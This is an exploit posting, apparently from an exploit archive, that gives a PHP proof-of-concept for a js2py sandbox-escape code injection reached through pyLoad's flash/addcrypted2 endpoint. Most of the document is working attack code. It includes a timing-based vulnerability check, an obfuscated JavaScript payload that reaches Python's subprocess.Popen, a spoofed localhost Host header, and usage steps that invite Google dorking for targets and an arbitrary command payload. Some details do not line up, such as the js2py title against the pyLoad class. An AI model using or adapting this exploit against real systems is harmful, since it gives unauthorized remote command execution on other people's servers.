=============================================================================================================================================
| # Title     : js2py versions 0.74 Code Injection Vulnerability                                                                            |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 131.0.3 (64 bits)                                                            |
| # Vendor    : https://pypi.org/project/Js2Py/                                                                                             |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] vulnerability found in js2py versions 0.74 and below. js2py is a popular python package that can evaluate javascript code inside a python interpreter.

[+] save code as poc.php .

[+] Line 98 + 99 : set your target.

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php

// Include necessary libraries for HTTP requests and encoding
require 'vendor/autoload.php'; // Example for using HTTP libraries like Guzzle or similar

class PyloadRCEExploit
{
    private $target;
    private $rport;
    private $targetUri;

    public function __construct($target, $rport = 9666, $targetUri = '/')
    {
        $this->target = $target;
        $this->rport = $rport;
        $this->targetUri = $targetUri;
    }

    public function check()
    {
        $sleepTime = rand(5, 10);
        $cmd = "sleep $sleepTime";

        $startTime = microtime(true);
        $this->executeCommand($cmd);
        $elapsedTime = microtime(true) - $startTime;

        echo "Elapsed time: $elapsedTime seconds\n";

        if ($elapsedTime > $sleepTime) {
            echo "Target is vulnerable! Command injection succeeded.\n";
            return true;
        }

        echo "Target is not vulnerable.\n";
        return false;
    }

    public function exploit($payload)
    {
        echo "Executing exploit on {$this->target}...\n";

        if (!$this->check()) {
            echo "Target is not vulnerable. Exploitation aborted.\n";
            return;
        }

        $this->executeCommand($payload);
        echo "Exploit executed. Check the target for results.\n";
    }

    private function javascriptPayload($cmd)
    {
        // Generate obfuscated JavaScript payload
        $escapedCmd = addslashes($cmd);
        return <<<EOD
let cmd = "$escapedCmd";
let base = '__base__';
let getAttribute = '__getattribute__';
let obj = Object.getOwnPropertyNames({})[getAttribute]("__class__")[base];
let subprocess = obj[getAttribute]('__subclasses__')().find(c => c.__module__ === 'subprocess' && c.__name__ === 'Popen');
subprocess(cmd, -1, null, -1, -1, -1, null, null, true).communicate();
EOD;
    }

    private function executeCommand($cmd)
    {
        $client = new GuzzleHttp\Client();
        $cryptedB64 = base64_encode(random_bytes(4));
        $javascriptPayload = $this->javascriptPayload($cmd);

        try {
            $response = $client->post("http://{$this->target}:{$this->rport}{$this->targetUri}flash/addcrypted2", [
                'headers' => [
                    'Host' => "127.0.0.1:{$this->rport}"
                ],
                'form_params' => [
                    'crypted' => $cryptedB64,
                    'jk' => $javascriptPayload
                ],
                'timeout' => 10
            ]);

            if ($response->getStatusCode() === 500) {
                echo "Command executed successfully.\n";
                return true;
            }

        } catch (Exception $e) {
            echo "Error: {$e->getMessage()}\n";
        }

        return false;
    }
}

// Example usage
$exploit = new PyloadRCEExploit('192.168.1.100');
$exploit->exploit('id'); // Replace 'id' with your desired payload


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================